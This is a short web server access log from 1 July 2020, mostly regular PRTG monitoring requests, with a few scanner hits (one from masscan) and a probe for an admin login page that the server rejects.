212.91.246.72 - - [01/Jul/2020:07:20:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.36.165.25 - - [01/Jul/2020:07:21:26 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
212.91.246.72 - - [01/Jul/2020:07:21:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:22:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:23:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:24:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:25:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:26:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.219.252.241 - - [01/Jul/2020:07:27:00 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
178.238.238.221 - - [01/Jul/2020:07:27:06 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
109.70.100.28 - - [01/Jul/2020:07:27:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
212.91.246.72 - - [01/Jul/2020:07:27:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:28:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:29:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:30:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.70.100.33 - - [01/Jul/2020:07:31:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
212.91.246.72 - - [01/Jul/2020:07:31:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:32:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:33:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:34:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:35:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:36:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:37:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:38:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jul/2020:07:39:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.220.101.29 - - [01/Jul/2020:07:39:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
220.134.226.25 - - [01/Jul/2020:07:39:52 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
115.96.154.13 - - [01/Jul/2020:07:40:22 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
